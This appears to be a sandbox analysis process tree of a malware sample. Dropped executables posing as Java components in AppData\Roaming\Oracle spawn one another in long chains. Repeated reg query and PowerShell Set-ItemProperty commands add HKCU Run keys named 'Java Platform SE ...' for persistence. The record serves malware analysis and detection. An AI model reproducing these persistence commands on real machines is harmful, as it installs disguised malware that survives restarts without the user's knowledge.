        PID:5472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6072
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:756
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        18⤵
        Executes dropped EXE
        
        PID:4188
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        21⤵
        Executes dropped EXE
        
        PID:3228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        22⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        23⤵
        Executes dropped EXE
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        24⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4480
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        25⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4052
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        26⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3500
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:2588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:1944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_platform.exe"
        29⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe\"'"
        29⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe"
1⤵
PID:3844
- C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
  2⤵
  PID:4836
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1060
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:2172
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3472
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4284
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        9⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        10⤵
        
        PID:1764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:1448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_update.exe"
        12⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe\"'"
        12⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe"
1⤵
PID:4304
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4716
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
    3⤵
    PID:1200
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5660
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5480
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_update.exe"
        7⤵
        Modifies registry key
        
        PID:772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe\"'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe"
1⤵
PID:4460
- C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5912
- - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
    3⤵
    PID:5476
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
      4⤵
      PID:3472
    - - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        5⤵
        
        PID:5268
      - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        6⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        7⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        8⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        9⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform.exe"
        10⤵
        Modifies registry key
        
        PID:3616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe\"'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe"
1⤵
PID:3644
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
  2⤵
  PID:4508
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
    3⤵
    PID:3200
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
      4⤵
      PID:5260
    - - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        5⤵
        
        PID:5592
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        6⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        7⤵
        
        PID:5492
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        8⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        9⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        10⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        11⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        12⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        13⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        14⤵
        
        PID:2600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        15⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        16⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        17⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        18⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        19⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        20⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        21⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        22⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        23⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        24⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        25⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        26⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        27⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        28⤵
        
        PID:4856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:772
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        29⤵
        
        PID:5888
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_platform.exe"
        30⤵
        Modifies registry key
        
        PID:1528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe\"'"
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe"
1⤵
PID:4524
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2480
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
  2⤵
  PID:2368
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    3⤵
    PID:5528
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
      4⤵
      PID:3232
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        5⤵
        
        PID:3336
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        6⤵
        
        PID:3956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        7⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        8⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        9⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        10⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        11⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        12⤵
        
        PID:1308
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        13⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        14⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        15⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_service.exe"
        16⤵
        Modifies registry key
        
        PID:4588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe\"'"
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe"
1⤵
PID:5676
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
  2⤵
  PID:2996
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
    3⤵
    PID:3160
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
      4⤵
      PID:3572
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        5⤵
        
        PID:1840
      - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        6⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        7⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        8⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        9⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        10⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        11⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        12⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        13⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        14⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        15⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        16⤵
        
        PID:3428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        17⤵
        
        PID:5600
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        18⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater.exe"
        19⤵
        Modifies registry key
        
        PID:2996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe\"'"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe"
1⤵
PID:5216
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5504
- C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
  2⤵
  PID:3312
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
      4⤵
      PID:3728
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4676
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        5⤵
        
        PID:5364
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        6⤵
        
        PID:3284
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        7⤵
        
        PID:3644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        8⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        9⤵
        
        PID:4648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        10⤵
        
        PID:5492
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        11⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        12⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        13⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        14⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        15⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        16⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        17⤵
        
        PID:4276
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        18⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        19⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        20⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        21⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        22⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        23⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        24⤵
        
        PID:3300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        25⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        26⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
